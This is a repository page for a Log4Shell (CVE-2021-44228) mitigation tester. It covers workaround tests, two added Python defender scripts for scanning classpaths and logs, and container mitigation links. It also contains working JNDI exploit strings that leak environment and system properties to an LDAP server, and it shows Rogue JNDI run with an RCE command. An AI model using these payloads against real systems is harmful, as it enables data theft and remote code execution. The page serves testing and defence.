
CVE-2021-44228 PoC — Apache Log4j code issue vulnerability

Source
Associated Vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
Log4Shell CVE-2021-44228 mitigation tester
Readme
# Log4Shell Mitigation tester

This is an example application using Log4j 2.14.1.

Source code: [App.java](app/src/main/java/log4shell/mitigation/tester/App.java)

The purpose of this is to be able to test different mitigation approaches. The mitigation approaches are also mentioned in [Microsoft’s Response to CVE-2021-44228 Apache Log4j 2](https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/).

## Example usage

Examples are for a bash shell.

Build the app:
```bash
./gradlew assemble
```

Run without any workaround:
```bash
java -jar app/build/libs/app-all.jar
```

Test the message lookup feature by passing a lookup string on the command line:
```bash
FOO='Hello ${env:USER}' java -jar app/build/libs/app-all.jar '${env:FOO}'
```

Test the `-Dlog4j2.formatMsgNoLookups=true` system property workaround, https://twitter.com/brunoborges/status/1469186875608875011
```bash
java -Dlog4j2.formatMsgNoLookups=true -jar app/build/libs/app-all.jar
```

Test the `LOG4J_FORMAT_MSG_NO_LOOKUPS=true` environment variable workaround, https://twitter.com/brunoborges/status/1469462412679991300
```bash
LOG4J_FORMAT_MSG_NO_LOOKUPS=true java -jar app/build/libs/app-all.jar
```

Test the `JAVA_TOOL_OPTIONS=-Dlog4j.formatMsgNoLookups=true` environment variable workaround, https://twitter.com/brunoborges/status/1469426918550245377
```bash
JAVA_TOOL_OPTIONS=-Dlog4j.formatMsgNoLookups=true java -jar app/build/libs/app-all.jar
```

Test the `log4j2.component.properties` in classpath workaround (the properties file is packaged in its own jar and put on the classpath together with the app):
```bash
java -cp log4j2-formatMsgNoLookups/build/libs/log4j2-formatMsgNoLookups.jar:app/build/libs/app-all.jar log4shell.mitigation.tester.App
```
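As an added example (not code from this repository), the following Python script inspects the jars on a classpath for the bundled log4j-core version and for a `log4j2.component.properties` entry that sets `log4j2.formatMsgNoLookups=true`, which is what the last command above relies on. It assumes the jar carries the Maven `pom.properties` for log4j-core (the official artifacts do, and fat jars normally keep it), takes 2.15.0 as the fixed version as this README does, and assumes the property is only honoured by Log4j 2.10.0 and later; the sample jars used in the test are constructed in memory.

```python
"""Added example (not part of the tester repo): inspect jars on a classpath for the
log4j-core version and for a log4j2.component.properties mitigation file.

Assumptions: jars built by Maven/Gradle carry
META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties (true for the
official log4j-core artifacts and preserved by shadow/fat jars); 2.15.0 is taken as
the fixed version, as the page states; the formatMsgNoLookups property is honoured
from 2.10.0 onward.
"""
import io
import re
import sys
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
COMPONENT_PROPS = "log4j2.component.properties"
FIXED_VERSION = (2, 15, 0)         # assumption: the page's patched release
PROPERTY_MIN_VERSION = (2, 10, 0)  # formatMsgNoLookups is ignored by older cores


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.14.1' (or '2.15.0-rc1') into a comparable tuple of ints."""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])


def read_properties(data: bytes) -> Dict[str, str]:
    """Minimal Java .properties reader: key=value / key:value, '#' or '!' comments."""
    props: Dict[str, str] = {}
    for raw in data.decode("utf-8", "replace").splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def inspect_jar(jar_bytes: bytes) -> Dict[str, Optional[object]]:
    """Report the embedded log4j-core version and any formatMsgNoLookups setting."""
    info: Dict[str, Optional[object]] = {"log4j_core_version": None, "format_msg_no_lookups": None}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            info["log4j_core_version"] = read_properties(zf.read(POM_PROPS)).get("version")
        if COMPONENT_PROPS in names:
            value = read_properties(zf.read(COMPONENT_PROPS)).get("log4j2.formatMsgNoLookups")
            if value is not None:
                info["format_msg_no_lookups"] = value.lower() == "true"
    return info


def assess_classpath(jars: List[bytes]) -> Dict[str, object]:
    """Combine per-jar findings into one verdict for the whole classpath."""
    versions: List[str] = []
    mitigated = False
    for jar in jars:
        info = inspect_jar(jar)
        if info["log4j_core_version"]:
            versions.append(str(info["log4j_core_version"]))
        if info["format_msg_no_lookups"] is True:
            mitigated = True
    exposed = [v for v in versions if parse_version(v) < FIXED_VERSION]
    # The component-properties workaround only helps cores that understand the property.
    covered = mitigated and all(parse_version(v) >= PROPERTY_MIN_VERSION for v in exposed)
    if not versions:
        status = "no-log4j-core"
    elif not exposed:
        status = "patched"
    elif covered:
        status = "mitigated-by-component-properties"
    else:
        status = "vulnerable"
    return {"versions": versions, "status": status}


def make_jar(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory jar (zip) from {path: content}; used for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python check_log4j_classpath.py <dir-with-jars>  (hypothetical script name)
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    found = [p.read_bytes() for p in root.rglob("*.jar")]
    print(assess_classpath(found))
```

The verdict deliberately distinguishes "patched" (core at or above the fixed version), "mitigated-by-component-properties" (an old core plus a properties jar it can actually read) and "vulnerable" (an old core with no usable mitigation, which includes a core older than 2.10.0 that ignores the property).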

## Seeing is believing - exploit this sample app

When you run the app with a JNDI lookup string as an argument, you will see the vulnerability in action:
```bash
❯ java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.0.1/a?user=${env:USER}}'
[2021-12-12 10:57:07,216] [main] [log4shell.mitigation.tester.App] INFO noLookups false
[2021-12-12 10:57:07,218] [main] [log4shell.mitigation.tester.App] INFO Lookups are enabled! The application is vulnerable for Log4Shell! Example lookup USER=lari
2021-12-12 10:57:07,239 main WARN Error looking up JNDI resource [ldap://127.0.0.1/a?user=lari]. javax.naming.InvalidNameException: ldap://127.0.0.1/a?user=lari
	at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:92)
	at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
```

You can also debug the app and set a breakpoint in the vulnerable code, which is
https://github.com/apache/logging-log4j2/blob/dd18e9b21009055e226daf5b233c92b6a17934ca/log4j-core/src/main/java/org/apache/logging/log4j/core/pattern/MessagePatternConverter.java#L119-L135

Set the breakpoint in class `org.apache.logging.log4j.core.pattern.MessagePatternConverter` at line 128.

When the mitigation is in place, the debugger should never enter that code block, and the LDAP call should not be attempted either:

```bash
❯ LOG4J_FORMAT_MSG_NO_LOOKUPS=true java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.0.1/a?user=${env:USER}}'
[2021-12-12 10:59:15,589] [main] [log4shell.mitigation.tester.App] INFO noLookups true
[2021-12-12 10:59:15,590] [main] [log4shell.mitigation.tester.App] INFO Lookups are disabled. Example lookup USER=${env:USER}
[2021-12-12 10:59:15,591] [main] [log4shell.mitigation.tester.App] INFO Provided command line arguments are [${jndi:ldap://127.0.0.1/a?user=${env:USER}}]
```
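As an added example for the defender side (not part of this repository), here is Python that pulls `${...}` lookup expressions out of log lines such as the ones above and flags the `jndi:` ones, including the nested form `${jndi:ldap://...?user=${env:USER}}`, where a naive match up to the first `}` would cut the expression short. The sample lines are constructed from the output format shown above, plus one hypothetical HTTP request line carrying the same lookup string.

```python
"""Added example (not part of the tester repo): extract Log4j-style ${...} lookups
from log lines and flag the jndi: ones, handling nesting such as
${jndi:ldap://host/a?user=${env:USER}}, which a flat regex for '${jndi:' followed
by the first '}' gets wrong. Sample lines are constructed from the page's output format."""
import re
from typing import Dict, List, Optional

# Matches "${jndi:<scheme>:" at the start of an expression and captures the scheme.
JNDI_RE = re.compile(r"^\$\{\s*jndi:([A-Za-z][\w+.-]*):", re.IGNORECASE)

SAMPLE_LINES = [
    "[2021-12-12 10:59:15,590] [main] [log4shell.mitigation.tester.App] INFO Lookups are disabled. Example lookup USER=${env:USER}",
    "[2021-12-12 10:59:15,591] [main] [log4shell.mitigation.tester.App] INFO Provided command line arguments are [${jndi:ldap://127.0.0.1/a?user=${env:USER}}]",
    "[2021-12-12 10:57:07,216] [main] [log4shell.mitigation.tester.App] INFO noLookups false",
    # constructed: the same lookup string arriving in an HTTP request line
    "GET /login?user=${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor}} HTTP/1.1",
]


def extract_lookups(text: str) -> List[str]:
    """Return every balanced ${...} expression in text, ordered by start offset.
    Nested expressions are returned as well as the expression that contains them."""
    found: List[tuple] = []
    open_positions: List[int] = []
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            open_positions.append(i)
            i += 2
            continue
        if text[i] == "}" and open_positions:
            start = open_positions.pop()
            found.append((start, text[start:i + 1]))
        i += 1
    # A stray "}" is ignored; an unterminated "${" never closes and is dropped.
    return [expr for _, expr in sorted(found)]


def jndi_scheme(expr: str) -> Optional[str]:
    """'ldap' for ${jndi:ldap://...}; None for non-JNDI lookups like ${env:USER}."""
    m = JNDI_RE.match(expr)
    return m.group(1).lower() if m else None


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """One alert per line that carries at least one JNDI lookup."""
    alerts: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        lookups = extract_lookups(line)
        jndi = [e for e in lookups if jndi_scheme(e)]
        if jndi:
            alerts.append({
                "line": number,
                "schemes": sorted({jndi_scheme(e) for e in jndi}),
                "jndi": jndi,
                # other lookups on the line, e.g. the ${env:...} values a JNDI
                # lookup would resolve and leak
                "other_lookups": [e for e in lookups if not jndi_scheme(e)],
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log_lines(SAMPLE_LINES):
        print(alert)
```

Only the second and fourth sample lines raise an alert; the mitigated output line with the unresolved `${env:USER}` is reported nowhere, because a non-JNDI lookup on its own is not the signal this scanner looks for.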

### Exploiting with Rogue JNDI

Demonstrating information leakage depends on the changes in https://github.com/veracode-research/rogue-jndi/pull/11.

In one terminal:
```bash
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
# build with PR https://github.com/veracode-research/rogue-jndi/pull/11 changes
git fetch origin pull/11/head
git checkout FETCH_HEAD
mvn package
# sample command is for Linux, remove `-c "zenity --progress --pulsate --text=You_are_hacked"` on other OSes or use any suitable RCE command
java -jar target/RogueJndi-1.1.jar -c "zenity --progress --pulsate --text=You_are_hacked"
```

In another terminal:
```bash
# demonstrate information leakage
java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}}'
# demonstrate RCE by adding "-Dcom.sun.jndi.ldap.object.trustURLCodebase=true"
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.1.1:1389/o=reference}'
```


## Kubernetes / docker mitigation solutions for Log4Shell

It is necessary to mitigate Log4Shell immediately without waiting for a new software release. Here are some solutions for doing that quickly and effectively.

### Patching existing docker images with a thin overlay that sets LOG4J_FORMAT_MSG_NO_LOOKUPS=true env

This is a generic solution:
https://github.com/lhotari/Log4Shell-mitigation-Dockerfile-overlay

### Example of patching existing docker images with Log4j 2.15.0 jar files

This is not generic; the example is from apache/pulsar:
https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228

### Patching k8s deployments with LOG4J_FORMAT_MSG_NO_LOOKUPS=true env

https://gist.github.com/brunoborges/9df576689b404aee70a8065210c77fb3


File Snapshot

```
[4.0K] /data/pocs/a0603c57b5d54427a34965a0955ccf54ba5dde62
├── [4.0K] app
│   ├── [1.2K] build.gradle
│   └── [4.0K] src
│       ├── [4.0K] main
│       │   ├── [4.0K] java
│       │   │   └── [4.0K] log4shell
│       │   │       └── [4.0K] mitigation
│       │   │           └── [4.0K] tester
│       │   │               └── [1.0K] App.java
│       │   └── [4.0K] resources
│       │       └── [ 330] log4j2.xml
│       └── [4.0K] test
│           └── [4.0K] java
│               └── [4.0K] log4shell
│                   └── [4.0K] mitigation
│                       └── [4.0K] tester
│                           └── [ 379] AppTest.java
├── [4.0K] gradle
│   └── [4.0K] wrapper
│       ├── [ 58K] gradle-wrapper.jar
│       └── [ 202] gradle-wrapper.properties
├── [7.9K] gradlew
├── [2.7K] gradlew.bat
├── [4.0K] log4j2-formatMsgNoLookups
│   ├── [  26] build.gradle
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] resources
│               └── [  31] log4j2.component.properties
├── [5.1K] README.md
└── [ 427] settings.gradle

19 directories, 12 files
```